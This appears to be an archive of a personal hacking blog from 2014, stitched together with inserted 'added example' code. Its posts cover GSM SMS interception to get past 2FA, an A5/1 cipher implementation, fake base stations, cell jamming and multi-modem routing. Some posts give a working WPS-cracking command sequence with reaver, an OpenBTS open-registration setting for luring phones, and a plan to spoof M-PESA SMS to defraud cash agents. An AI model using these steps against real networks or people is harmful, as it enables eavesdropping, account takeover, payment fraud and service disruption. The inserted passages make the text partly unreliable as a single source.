One thing I love about trying to secure systems is that people forget "you are only as strong as your weakest link".
Today we break a system protected by 2FA. Take Google's Gmail as an example: you sign in with your password, and to add a second factor you must also supply another token, such as a code sent to your phone via SMS.
Pretty secure, huh? Not really.... it can still be broken. Of course, many people would assume this write-up ends with us stealing a phone, but the truth of the matter is I will not need to touch your phone. So here we go.
The setup:
first, we need the user's password (I am not going to cover this, as many tutorials already exist, from phishing to plain brute force)
second, we obviously need the SMS token sent to the user (hint: this tutorial is about that)
I will break this down into 2 parts: the explanation only, then the POC.
EXPLANATION
We will intercept the SMS by attacking the Um (air) interface between the victim's mobile phone and the BTS (Base Transceiver Station).
Why does this work, and what might be a solution/remediation for it?
1. I have covered this topic before, but I am going to explain again. GSM is a broken technology (what follows is GSM-specific; a CDMA phone is not exposed to this particular attack).
2. GSM in most countries uses weak or broken encryption; the options are:
A5/0 ---- no encryption
A5/1 ---- the most commonly used; a stream cipher with a 64-bit key, breakable with roughly 2 TB of precomputed rainbow tables in 5-30 minutes on a decent computer
A5/2 ---- a deliberately weakened export version, not commonly used any more and broken in real time
A5/3 ---- the newer cipher (KASUMI); a practical related-key attack exists on the cipher itself, though not one that breaks it as deployed in GSM
3. Phones do not authenticate the BTS they connect to (GSM authenticates the phone to the network, never the network to the phone), and they have no way to tell whether any sniffing* is going on.
4. A BTS that does not use frequency hopping allows passive sniffing (explained in part 2).
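Point 2 in practice: here is the A5/1 keystream generator as an added Python example (not code from the original post; the structure follows the 1999 public reimplementation by Briceno, Goldberg and Wagner, and the key/frame pair in the demo is that implementation's published test vector). The thing to notice is how little there is: 64 bits of register state, seeded from the 64-bit session key Kc and a 22-bit frame number that is sent in the clear, with the same Kc reused for every frame of a call. That is what makes a precomputed-table attack feasible, and an SMS is just one more burst XORed with this keystream.

```python
"""A5/1, the GSM air-interface stream cipher, as a keystream generator.

Added example, not code from the original post. The register layout follows
the 1999 public reimplementation by Briceno, Goldberg and Wagner; the key and
frame number in the demo are that implementation's published test vector.
"""
from __future__ import annotations

# Three LFSRs. Bit 0 is the newest bit; the output is taken from the top bit.
R1_MASK, R1_TAPS, R1_CLK = 0x07FFFF, 0x072000, 0x000100  # 19 bits; taps 13,16,17,18; clock bit 8
R2_MASK, R2_TAPS, R2_CLK = 0x3FFFFF, 0x300000, 0x000400  # 22 bits; taps 20,21;      clock bit 10
R3_MASK, R3_TAPS, R3_CLK = 0x7FFFFF, 0x700080, 0x000400  # 23 bits; taps 7,20,21,22; clock bit 10
R1_OUT, R2_OUT, R3_OUT = 18, 21, 22


def _parity(x: int) -> int:
    return bin(x).count("1") & 1


def _shift(reg: int, mask: int, taps: int) -> int:
    """Clock one register: shift left and feed the XOR of its tap bits into bit 0."""
    return ((reg << 1) & mask) | _parity(reg & taps)


class A51:
    """Keystream generator for one GSM frame under session key Kc."""

    def __init__(self, kc: bytes, frame: int) -> None:
        if len(kc) != 8:
            raise ValueError("Kc is 64 bits")
        if not 0 <= frame < (1 << 22):
            raise ValueError("frame number is 22 bits")
        self.r1 = self.r2 = self.r3 = 0
        # Key setup: clock all three registers in lockstep (no majority rule)
        # while XORing in the 64 key bits, then the 22 frame-number bits.
        for i in range(64):
            self._clock_all()
            self._mix((kc[i >> 3] >> (i & 7)) & 1)
        for i in range(22):
            self._clock_all()
            self._mix((frame >> i) & 1)
        # 100 irregular clocks with the output thrown away.
        for _ in range(100):
            self._clock()

    def _mix(self, bit: int) -> None:
        self.r1 ^= bit
        self.r2 ^= bit
        self.r3 ^= bit

    def _clock_all(self) -> None:
        self.r1 = _shift(self.r1, R1_MASK, R1_TAPS)
        self.r2 = _shift(self.r2, R2_MASK, R2_TAPS)
        self.r3 = _shift(self.r3, R3_MASK, R3_TAPS)

    def _clock(self) -> None:
        """Majority clocking: a register moves only if its clock bit agrees with the majority."""
        c1 = bool(self.r1 & R1_CLK)
        c2 = bool(self.r2 & R2_CLK)
        c3 = bool(self.r3 & R3_CLK)
        maj = (c1 + c2 + c3) >= 2
        if c1 == maj:
            self.r1 = _shift(self.r1, R1_MASK, R1_TAPS)
        if c2 == maj:
            self.r2 = _shift(self.r2, R2_MASK, R2_TAPS)
        if c3 == maj:
            self.r3 = _shift(self.r3, R3_MASK, R3_TAPS)

    def bit(self) -> int:
        self._clock()
        return ((self.r1 >> R1_OUT) ^ (self.r2 >> R2_OUT) ^ (self.r3 >> R3_OUT)) & 1


def _pack(bits: list[int]) -> bytes:
    """Pack bits MSB-first; 114 bits become 15 bytes with the last byte holding 2 bits."""
    out = bytearray((len(bits) + 7) // 8)
    for i, b in enumerate(bits):
        out[i >> 3] |= b << (7 - (i & 7))
    return bytes(out)


def a51_keystream(kc: bytes, frame: int) -> tuple[bytes, bytes]:
    """The 228-bit keystream for one frame as (downlink half, uplink half)."""
    gen = A51(kc, frame)
    bits = [gen.bit() for _ in range(228)]
    return _pack(bits[:114]), _pack(bits[114:])


def xor_burst(burst: bytes, keystream_half: bytes) -> bytes:
    """Encrypt or decrypt one 114-bit burst with a keystream half; the same call does both."""
    return bytes(a ^ b for a, b in zip(burst, keystream_half))


if __name__ == "__main__":
    kc = bytes.fromhex("1223456789ABCDEF")  # test-vector Kc from the reference code
    down, up = a51_keystream(kc, 0x134)      # test-vector frame number
    print("downlink:", down.hex())
    print("uplink:  ", up.hex())
```

Run it directly to print the two 114-bit halves (GSM uses the first for the downlink and the second for the uplink of a frame). xor_burst applies a half to a captured burst, which is all "decryption" amounts to once Kc is known; note that the only thing that changes from frame to frame is the public frame number, which is why the rainbow-table attack on point 2 only has to be precomputed once.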
POC? As usual, find it in part two. Meanwhile, google the terms that may have eluded you in this piece, as we will dig even deeper later on.
Thursday, November 13, 2014
Wednesday, July 9, 2014
A hackers Guide to Mac/MacBooks/Mac OS X
Well, I remember when I started this blog I wrote an article that had 'fuck macports' somewhere... I am sorry, I take that back. Now let's start:
Mac OS --- Unix-like (Darwin, whose userland descends from BSD, out of Berkeley; see image), closed source (for the most part), with a graphical interface that even Windows questions in supremacy. And no, I will not do a h/ware review...
So, Mac OS X to be specific...
10.7 ----> love it, totally do....
10.8 ----> just as above, love it...
10.9 ----> what have we here? bloat? clang and no gcc, smh! Xcode does not help as much, so what do we do?
Newbies.... when you want Linux*-style binaries on your Mac and you think there are no package managers like Debian/Ubuntu (apt) or Fedora/CentOS (yum) have...
think twice... there are:
- Homebrew (very clean... but that's it, clean) uses Ruby and git to work its package magic, and amazingly its formulas are very easy to read and write (Ruby's ease and power)
- Fink (so far... I don't really want to call it a problem... but it is) this is basically apt/dpkg on Mac OS X; honestly it has everything Ubuntu/Debian packages would do, but the repositories have been a pain for me :(
- MacPorts (so far... loving it) now this is a package manager... clean, stable... well, it lacks a few binaries, but hey, nothing's perfect... can't really complain :)
But first you need Xcode (or at least its Command Line Tools) to install these (it is pretty huge, btw); it has all the developer tools from make to clang (which replaces gcc/g++) [I had to install gcc49 from Homebrew to get a better compile; clang sucks]
Anyway, once you are done with that, here's the fun bit... install the necessary tools. For me:
hacking tools:
nmap
hydra
john the ripper
reaver
Metasploit 3
wireshark
p0f
yersinia*
yara
... tonnes of them... for me :) I basically have my own set (actually porting TYPHON here); if it works you will know, aight
Thursday, June 26, 2014
Evil Twin [GSM Style]
Now I have an evil twin... lol, not exactly what you think (another one like me, only evil? hell no); in a security sense/point of view, an evil twin, from Wikipedia [full article]:
    Evil twin is a term for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications.[1]
    An evil twin is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider.
    This type of evil twin attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent web site and luring people there.[2]
It works as above. Now, I actually saw a demo of this at AfricaHackOn (the first information security conference in Africa) on the 28th of February 2014, where hackers named Casper and D3crapt did the demo on stage, faking Wi-Fi connections and doing a major MITM attack on unsuspecting people. With this knowledge, I found it quite interesting and I wanted to take it a notch further, and you know what :) .... I succeeded. What I wanted to do was simply achieve the same attack, but not on a small scale like Wi-Fi, no... a bigger scale, say GSM (SMS/voice/data/mobile-payment platform) [the whole nine yards].
Now, with this given info, we know what attack we are carrying out, as evil twin really relies on MITM, and most of all we do want data, right? And all variables check out, right?
Did I make it? Now I know that's the main question, but let's look at MITM (man-in-the-middle attack):
    The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point can insert himself as a man-in-the-middle).
Let's see:
- GSM: relies heavily on the same concept as Wi-Fi... no, actually Wi-Fi relies heavily on the same structure GSM was/is built on (a client attaches to whichever base station offers the strongest usable signal), so if it works for Wi-Fi... it might work for GSM.
- GSM: for a successful MITM [a man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to the satisfaction of the other; it is an attack on mutual authentication, or the lack thereof]. GSM has exactly this gap: the network authenticates the phone, but the phone never authenticates the network.
- Evil twin: create a fake broadcast channel/transmission unit
- MITM: capture sessions, data and even the choice of cipher (a fake BTS can simply tell the phone to use A5/0, i.e. no encryption)
Now.... what works... well, long story short, everything, alas....
Now, materials.
Hardware.... in the case of Wi-Fi, routers (the broadcast station); in the case of GSM, SDRs (software-defined radios).
Now here's a tricky bit where I will throw in tonnes of comparison; for SDRs we have:
- USRP ---> expensive (I kid you not): around 2500 USD for a good full set. After that it has enough documentation to set up, run, configure, tweak and build applications (so easy after purchasing it), and it has been ported to nearly every single platform out there (Mac, Linux and Windows).
- RTL-SDR ---> enter the familiar, easy-to-configure, cheap and affordable RTL: a DVB-T USB TV tuner that acts as an SDR. Trust me, it is powerful and cheap at 20 USD or less, has a lot of documentation and has been ported to nearly every single platform out there (Mac, Linux and Windows). One caveat: it is receive-only, so it can sniff the downlink but cannot transmit, which means it cannot stand up the fake BTS itself.
- OsmocomBB ---> these are specific devices running special firmware that will do wild things on GSM frequencies, and when I say wild, I mean wild: from acting as phones (Calypso-based Motorola C113, C115, C118, C123, C139; these phones are ultra cheap, 20 USD or less) onwards. But the real price you pay is the following.... nearly primitive code (it is good code, but you will pay with a full read-up of how raw GSM works; I have been at this for 14 or so months and have not fully mastered the whole thing yet), no documentation (OK, there is some, but it is new, so expect quite a few faults). In short, not the best thing to start off with as a noob (sadly, as this is what we will use).
- Now there are other options (sadly I won't recommend them yet, as I am still to get my hands on them [talking about BladeRF, HackRF and others]).
OK, so we have hardware, and we have software, which I have also listed with its hardware.
What we need to do... I guess now it's basically setup > run, or what else?
OK, we can learn, but I am already on my second full page scroll and we haven't done anything yet.... setup is easy if you ask me (OK, it wasn't when I started, but talk to me and I can give you a script to do all that :) alright). Moving on....
After the setup, what do we expect :) ...
HAVOC.... OK, OK, I am on sugar... let's relax...
Set up a fake BTS (an evil twin) capable of intercepting mobile (GSM modem) traffic, hence:
- location disclosure (find the victim's vicinity)
- SMS (uplink) capture (downlink can be done with RTL-SDR)
- voice (uplink) (same as above)
- data (uplink and downlink)
- mobile-payment platform infiltration (yes, it is possible to hack both agent and client)
- umm, yes, this is the best so far, I think, but I will not disclose further details (updating SIM card details, not simple things like contacts only; even trivial things like the SIM card apps on it)
- lastly, falsify (spoof) information to our captured assailants :)
So what did we just do there :) everything....
POC? You want it.... find me, buy me a big KFC lunch and I will sort you out; yes, knowledge should be paid for with food, and maybe an occasional bank-account top-up like a donation, but hey, I am #iOut.
Tuesday, June 17, 2014
I am explaining, don't arrest me, it's called consultancy.... and heads up.... I am the good guy
Now, today's news.
Well, a friend of mine asked me how someone can block/jam a cell (mobile, in this case) network....
So many ways....
1. Broadcast noise
2. Fake a network signal, hence intercept and interrupt the network
3. Kill transmission
1. Now this is simple... broadcast noise on the same frequency as the mobile network, just a little louder than the phones can listen to, and... baaam, out.
2. Now I did illustrate all this earlier when I put up the post about creating a fake BTS.....
Now people think this is very trivial; surprising thing... it kind of isn't. Here is my cell jammer budget:
USRP N210/N200 plus a laptop and a very good antenna.... cost 6000 or so USD, or in Kenyan shillings about 500,000 KSH....
Or, since we don't want all that expense.... here we go: 600 USD, or in Kenyan shillings a laptop and a 2000 KSH phone; yes, the Motorola C118 comes in handy here....
3. Kill transmission... this is what was said to have happened, i.e. the BTS (tower/booster) was disconnected from the power source.
Now to expound on no. 2, here we go:
Since I explained how to make a BTS from cheap materials (a laptop and a 2000 KSH (~20 USD) phone),
we have the requirements to run the fake network... and with that, let phones connect to our network so they cannot access the original one... so what distance can we cover... from 50 m to 6 km.
And how many BTSs can we interrupt? Well, one at a time.... (a location area (LAC) groups a number of BTSs, and that number varies by operator; it is not a fixed count of six). So is it possible? VERY possible.
Prevention... as Chris Paget said, "You can absolutely do nothing when someone jams a cellphone using noise... absolutely nothing."
VX #iOUT
Monday, June 9, 2014
Making sure that data from two modems gets routed via the same channel it came through, even when it is split over two simultaneously connected modems
OK, so since I have shown a method to get access to the internet with multiple modems, someone asked: what if I need the same data to pass through the same modem (why? in case of a download that shouldn't be stopped / doesn't support resume)? So... here's a method (it is the classic multiple-uplink recipe from the Linux Advanced Routing & Traffic Control HOWTO)...
So we come up with names. Let $IF1 be the name of the first interface and $IF2 the name of the second interface. Then let $IP1 be the IP address associated with $IF1 and $IP2 the IP address associated with $IF2. Next, let $P1 be the IP address of the gateway at provider 1 (for a PPP modem link this is the peer address), and $P2 the IP address of the gateway at provider 2. Finally, let $P1_NET be the IP network $P1 is in, and $P2_NET the IP network $P2 is in.
One creates two additional routing tables, say T1 and T2. These are added in /etc/iproute2/rt_tables (one line each: a free number and the name, e.g. "201 T1" and "202 T2"). Then you set up routing in these tables as follows:
    ip route add $P1_NET dev $IF1 src $IP1 table T1
    ip route add default via $P1 table T1
    ip route add $P2_NET dev $IF2 src $IP2 table T2
    ip route add default via $P2 table T2
Nothing spectacular: just build a route to the gateway and a default route via that gateway, as you would in the case of a single upstream provider, but put the routes in a separate table per provider. Note that the network route suffices, as it tells you how to find any host in that network, which includes the gateway.
Next you set up the main routing table. It is a good idea to route things to the direct neighbour through the interface connected to that neighbour. Note the `src' arguments: they make sure the right outgoing IP address is chosen.
    ip route add $P1_NET dev $IF1 src $IP1
    ip route add $P2_NET dev $IF2 src $IP2
Then your preference for the default route:
    ip route add default via $P1
Next, you set up the routing rules. These actually choose which routing table to route with. You want to make sure that you route out a given interface if you already have the corresponding source address:
    ip rule add from $IP1 table T1
    ip rule add from $IP2 table T2
This set of commands makes sure all answers to traffic coming in on a particular interface get answered from that interface.
NB: if $P0_NET is the local network and $IF0 is its interface, the following additional entries are desirable, so that a process bound to one provider's address can still reach the LAN, the other provider's network and loopback:
    ip route add $P0_NET dev $IF0 table T1
    ip route add $P2_NET dev $IF2 table T1
    ip route add 127.0.0.0/8 dev lo table T1
    ip route add $P0_NET dev $IF0 table T2
    ip route add $P1_NET dev $IF1 table T2
    ip route add 127.0.0.0/8 dev lo table T2
Now, this is just the very basic setup. It will work for all processes running on the router itself, and for the local network if it is masqueraded. If it is not, then you either have IP space from both modems or you are going to want to masquerade to one of the two modems. In both cases you will want to add rules selecting which modem to route out from, based on the IP address of the machine in the local network.
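The same recipe as an added Python example (not the post's own code): it turns the $IF/$IP/$P/$P_NET variables into the ordered ip(8) command list, NB entries included, and can apply it. ip route replace is used instead of add so the script can be re-run after a modem redials, and because ip rule add is not idempotent each rule is deleted (failure tolerated) before it is added. The interface names, addresses and the table numbers 201/202 are constructed for the demonstration; run it with --apply as root to actually change the routing.

```python
"""Multi-uplink routing: per-provider tables plus source-address rules.

Added example, not code from the original post. The Uplink values in DEMO
are constructed; the table numbers 201/202 are simply unused IDs.
"""
import shlex
import subprocess
import sys
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class Uplink:
    iface: str     # $IF1 / $IF2
    addr: str      # $IP1 / $IP2
    gateway: str   # $P1 / $P2 (for a PPP modem link: the peer address)
    net: str       # $P1_NET / $P2_NET in CIDR form
    table: str     # T1 / T2, the name used in /etc/iproute2/rt_tables


def rt_tables_additions(existing: str, uplinks: Iterable[Uplink], first_id: int = 201) -> str:
    """Lines to append to /etc/iproute2/rt_tables for any table not already named there."""
    named = set()
    for line in existing.splitlines():
        fields = line.split()
        if len(fields) >= 2 and not fields[0].startswith("#"):
            named.add(fields[1])
    new = [f"{first_id + i}\t{u.table}" for i, u in enumerate(uplinks) if u.table not in named]
    return "".join(line + "\n" for line in new)


def routing_commands(uplinks: List[Uplink], lan_net: Optional[str] = None,
                     lan_iface: Optional[str] = None, preferred: int = 0) -> List[str]:
    """The ip(8) commands, in order, that implement the setup described above."""
    cmds: List[str] = []
    for u in uplinks:
        # Per-provider table: the gateway's network, the other provider's
        # network, the LAN and loopback (the NB entries), then a default
        # route via this provider's gateway.
        cmds.append(f"ip route replace {u.net} dev {u.iface} src {u.addr} table {u.table}")
        for other in uplinks:
            if other is not u:
                cmds.append(f"ip route replace {other.net} dev {other.iface} table {u.table}")
        if lan_net and lan_iface:
            cmds.append(f"ip route replace {lan_net} dev {lan_iface} table {u.table}")
        cmds.append(f"ip route replace 127.0.0.0/8 dev lo table {u.table}")
        cmds.append(f"ip route replace default via {u.gateway} table {u.table}")
    # Main table: direct neighbours out of their own interface with the right
    # source address, and the preferred provider as the default route.
    for u in uplinks:
        cmds.append(f"ip route replace {u.net} dev {u.iface} src {u.addr}")
    cmds.append(f"ip route replace default via {uplinks[preferred].gateway}")
    # Rules: packets sourced from a provider's address consult that provider's
    # table, so replies leave through the interface they arrived on.
    for prio, u in enumerate(uplinks, start=100):
        cmds.append(f"ip rule del from {u.addr} table {u.table} priority {prio}")
        cmds.append(f"ip rule add from {u.addr} table {u.table} priority {prio}")
    return cmds


def apply(cmds: Iterable[str]) -> None:
    """Run the commands as root. A failing 'ip rule del' only means the rule was absent."""
    for cmd in cmds:
        tolerate = cmd.startswith("ip rule del")
        subprocess.run(shlex.split(cmd), check=not tolerate,
                       stderr=subprocess.DEVNULL if tolerate else None)


# Constructed demo values: two PPP modems and a LAN on eth0.
DEMO = [
    Uplink("ppp0", "10.0.1.2", "10.0.1.1", "10.0.1.0/24", "T1"),
    Uplink("ppp1", "10.0.2.2", "10.0.2.1", "10.0.2.0/24", "T2"),
]

if __name__ == "__main__":
    commands = routing_commands(DEMO, lan_net="192.168.0.0/24", lan_iface="eth0")
    if "--apply" in sys.argv:
        with open("/etc/iproute2/rt_tables") as f:
            missing = rt_tables_additions(f.read(), DEMO)
        if missing:
            with open("/etc/iproute2/rt_tables", "a") as f:
                f.write(missing)
        apply(commands)
    else:
        print("\n".join(commands))
```

Without --apply it only prints the commands, which is the easiest way to review what will change on a box you care about; after applying, `ip route show table T1` and `ip rule show` are the checks that the per-provider tables and rules actually landed.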
Now, before you SUE me.... I am helping... like, for real, I AM. #ATTACKING MOBILE PAYMENT SYSTEM MiTM+SE
So a while ago I actually stated that attacking mobile payment systems is inevitable.... Now, I have not suggested I will be doing that, though stick around and you might probably learn a thing or two about this.... Now here goes nothing.
So the basic structure of a mobile money system is pretty simple.
For example, I use Safaricom's M-PESA... this is their earlier structure (yet to find any major change, though).
OK, first of all let it be known... I am not doing this on Safaricom's M-PESA, except for the fact that:
1. I use M-PESA (actually never used any other service)
2. I own an M-PESA SIM (duh), hence my test was restricted to only this
3. I am pretty sure this works on other networks (though not tested)
OK, variables....
M-PESA on a standard keypad is spelt by the digits 67372..... I found this out playing with my iPhone (it was a 3G) quite a while ago.... :) See, I once tried saving it as a contact and the above digits popped up.... Anyway, trying to call the number (oh, what could go wrong) reverted to activating my SIM toolkit, lol... surprise.... and there was my first breakthrough.... Now, how do we exploit this?
Well, man-in-the-middle is a nice way, but how do you MITM someone when you cannot clearly send a message without spoofing the sender ID.... THAT'S IT :) uh huh. So step one.... create a GSM network... OK, that's not so easy? Well it is, actually... I did it in 3 hours. OK, to be fair, I had hard-coded something close to that over a few months, lol... just had to watch enough YouTube videos... join the OpenBTS forum, revisit my DCE classes (digital computer engineering), a little of my ADCE also, a lot of soldering. OK, long story short, I reused a lot of code, and I have already posted that here (well, that's just like the Um (air) layer only, where you have a BTS that controls several phones at once)....
with a few configurations, like setting
Control.LUR.OpenRegistration = .*
to allow any phone to register with the BTS... MITM is more than inevitable....
Now here's the trick that makes all this work.... once you send an SMS to any phone with the sender number 67372.... the result automatically displays.... MPESA... pretty nifty, huh :)
Now Safaricom has done a good thing in not allowing arbitrary SMSs to be sent to the agents' phones, but hmmmm, that's not enough.... they are still normal phones/SIM cards and basically have the IMSI that I am sending the message/SMS to... Here is my proof of sending a message to myself (YES, MYSELF; that ain't ILLEGAL :)) and deceiving my SIM that it's an M-PESA message... Here is the screenshot; you can see some other transactions below (legit, I might add).
And with a little S.E. we can craft an SMS, send it to an agent and pretend to withdraw the cash.... this is a serious felony right here. I will be contacting Safaricom in the meantime... if you don't hear from me... well... take a wild guess :)
VX #iOut
(oh, not only Safaricom) other telcos will also be notified. As my niece says, BAI (bye)
Wednesday, June 4, 2014
TYPHON
I always go into hiding when things are in a knot... currently I have had some good news....
A new GSM hacking tool by VX is out... VX has been on this path for a while, trying to come up with a good remedy to sort* out all the newbies and experts in the GSM field (read: RF).
What does it do? :) .....
So, on a basic stand-off in the field of hacking (read: pen-test and vulnerability assessment), a lot of the procedure goes like...
- we do recon of the area, networks, base stations (call them boosters if you like, but I am not saying that is correct) and also rogue base stations (come on, you want to know when someone is listening to you, right?)
- scan the area (now this and step one basically share the same ideology, but other methods can be employed in step one that have a different point of operation from step two)
- gain access --- rather, gain access to certain channels + frequencies (read: ARFCN, the carrier number that, in a very big nutshell, identifies a BTS)
- maintain access... (this simply means camping (SYNC) on that BTS (ARFCN) and now listening very well to the SMS/voice/data.... see, we good, right?)
- we add our own step here.... crack the encryption (if any is used)
- cover tracks (well, so far I have yet to find any tracks to be covered, so just run when you are done, okay?)
Well, you get the picture... so what we will do is debug entire scenarios of GSM in the same format.
So this tool --- TYPHON. Who should be credited?
A lot of people.... let's start with:
The firmware guys (OsmocomBB)
Most of the scripts (brmlab)
The guy who created it all and maintains it (VX)
Well then, how does it work?
>> basic explanation.... connect GSM hardware to your computer to be able to debug the air interface (communication between the BTS and the MS); the hardware more or less acts as a network card between the air interface and our PC and software. Here OsmocomBB (Open source mobile communications BaseBand) comes in: this is a stack running on your Calypso-based device (support for others may be added later on), e.g. Motorola C115, C118, C123 (get all of them here), that interfaces to your laptop; this allows fluid communication and lets you study what is happening on the air interface.
And that is the most basic principle....
With this we can do a lot of things, as stated above; the full details will be published as soon as the tool is released. Thank you :)
So check the links out and also follow @taeCode0h on Twitter for more info and for when he will release the tool.
Saturday, April 19, 2014
That Wi-Fi (zero dictionary and obviously its WPA/2)
So first of all, I hardly do this (lies), but as a request from a friend, here we go:
So you want to attack a WPA/WPA2-based Wi-Fi? lool, OK, I will let you go ahead... it's not easy; actually, no direct attack on WPA2 itself is known (the usual route is an offline dictionary attack on the captured 4-way handshake, which the title of this post rules out). WEP, on the other hand, ahem, too easy. Anyway, here is the funny bit: sit back, relax and let's do one of the simplest ways.
Tools>>Prerequisites:
BackTrack 5 R3 ---- Kali Linux
Reaver (plus the aircrack-ng suite, which both distributions ship)
(if you are on a Debian-based system, do a quick install with)
apt-get update
apt-get install reaver
done
Now, how reaver works..... (yes, the boring details --- I hate making script-kiddies; worse, I hate noobs who won't try to find out what is happening) so here is the source and a link to how it works, alright? We are going to attack Wi-Fi Protected Setup (WPS) via brute force: the 8-digit WPS PIN is verified in two halves, so only about 11,000 guesses are needed instead of 10^8, and once the PIN is recovered the access point hands over the WPA/WPA2 passphrase itself.
So, ahem.
Open a terminal (no, stop asking me about the GUI --- you want to hack? At least learn the terminal)
OK, on the terminal do :) ___
iwconfig
lists the wireless interfaces available
mine is wlan0
airmon-ng
checks monitor-mode status
airmon-ng stop [stale monitor interface, if any] [e.g. mon0]
removes a leftover monitor interface from an earlier run
airmon-ng start [your interface] [mine is wlan0]
puts the card into monitor mode; on BackTrack/Kali 1.x this creates mon0, which is the interface the following commands need (running them on wlan0 only works if that interface is already in monitor mode)
airodump-ng [your monitor interface] [mine is mon0]
packet capturing; note the target's BSSID and channel
Open a new terminal:
wash -i [your monitor interface] -c CHANNEL_NUM -C -s
this checks whether the Wi-Fi we are attacking is WPS-enabled (and whether WPS is locked, in which case reaver will stall)
Open a new terminal:
reaver -i [your monitor interface] -b [BSSID] -c CHANNEL_NUM -vv --fail-wait=360
and finally FATALITY :)
if all plays according to plan... you may win 97.2% of the times I go through... if not, ahem, more sophisticated attacks exist.
Oh, and yes, sometimes applications like NetworkManager affect the result, so kill them before starting (and sometimes they don't). Tools depend on your configuration, so stop asking me if they worked on my side: THEY DID. :)
VX out
Friday, March 21, 2014
OK.... (oh, I am gonna pay for this, I know)
Now stop asking me for free internet; I mean, for real, is it so hard to think as a hacker? Come on, you want something... you make it happen, right? After my last post on how to get free internet, people have always asked how to save themselves from the issue of the modem disconnecting after 10 minutes or so.... (applies to CDMA only)
Now here's a good hack:
- use a dialer that supports auto/re-connect; pppd and wvdial are my favourite dialers, since I am *nix till I die, so...
- create a bash/batch script calling reconnect
- use a fully connected system.... multiple modems that take over from each other when one disconnects, change the data/traffic route accordingly, and also allow the data/traffic to stay on a specific device/modem....
We good? Alright.
I will show the following methods:
- a bash script to check which modem/device has the highest speed (read: is connected)
- after that, change the route to the currently connected modem (read: highest speed)
- finally, make sure the above connections can be used, e.g. to stream a video (very difficult... but not impossible)
Script:
As I said, I use wvdial a lot, so.... calling the modems with wvdial:
    sudo wvdialconf
    [sudo] password for taecode0h:
    Editing `/etc/wvdial.conf'.

    Scanning your serial ports for a modem.

    Modem Port Scan<*1>: S0   S1   S2   S3
    ttyACM0<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
    ttyACM0<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 115200 baud
    ttyACM0<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.

    Sorry, no modem was detected!  Is it in use by another program?
    Did you configure it properly with setserial?

    Please read the FAQ at http://alumnit.ca/wiki/?WvDial
This command scans the serial ports for modems and then writes what it finds to the config file /etc/wvdial.conf. The first run above detected nothing; the run below did.
Now we can replicate the same config file, as we will use the same settings because both modems are from the same company; with that said, we will also be required to use a different serial port for the second modem, depending on what it finds: .....
    taecode0h@r41nsec:~$ sudo wvdialconf
    Editing `/etc/wvdial.conf'.

    Scanning your serial ports for a modem.

    Modem Port Scan<*1>: S0   S1   S2   S3
    ttyACM0<*1>: ATQ0 V1 E1 -- OK
    ttyACM0<*1>: ATQ0 V1 E1 Z -- OK
    ttyACM0<*1>: ATQ0 V1 E1 S0=0 -- OK
    ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
    ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
    ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyACM0<*1>: Modem Identifier: ATI -- MF192-T-1.0.0
    ttyACM0<*1>: Speed 4800: AT -- OK
    ttyACM0<*1>: Speed 9600: AT -- OK
    ttyACM0<*1>: Speed 19200: AT -- OK
    ttyACM0<*1>: Speed 38400: AT -- OK
    ttyACM0<*1>: Speed 57600: AT -- OK
    ttyACM0<*1>: Speed 115200: AT -- OK
    ttyACM0<*1>: Speed 230400: AT -- OK
    ttyACM0<*1>: Speed 460800: AT -- OK
    ttyACM0<*1>: Max speed is 460800; that should be safe.
    ttyACM0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyACM1<*1>: ATQ0 V1 E1 -- OK
    ttyACM1<*1>: ATQ0 V1 E1 Z -- OK
    ttyACM1<*1>: ATQ0 V1 E1 S0=0 -- OK
    ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
    ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
    ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyACM1<*1>: Modem Identifier: ATI -- MF192-T-1.0.0
    ttyACM1<*1>: Speed 4800: AT -- OK
    ttyACM1<*1>: Speed 9600: AT -- OK
    ttyACM1<*1>: Speed 19200: AT -- OK
    ttyACM1<*1>: Speed 38400: AT -- OK
    ttyACM1<*1>: Speed 57600: AT -- OK
    ttyACM1<*1>: Speed 115200: AT -- OK
    ttyACM1<*1>: Speed 230400: AT -- OK
    ttyACM1<*1>: Speed 460800: AT -- OK
    ttyACM1<*1>: Max speed is 460800; that should be safe.
    ttyACM1<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyACM2<*1>: ATQ0 V1 E1 -- OK
    ttyACM2<*1>: ATQ0 V1 E1 Z -- OK
    ttyACM2<*1>: ATQ0 V1 E1 S0=0 -- OK
    ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
    ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
    ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyACM2<*1>: Modem Identifier: ATI -- MF192-T-1.0.0
    ttyACM2<*1>: Speed 4800: AT -- OK
    ttyACM2<*1>: Speed 9600: AT -- OK
    ttyACM2<*1>: Speed 19200: AT -- OK
    ttyACM2<*1>: Speed 38400: AT -- OK
    ttyACM2<*1>: Speed 57600: AT -- OK
    ttyACM2<*1>: Speed 115200: AT -- OK
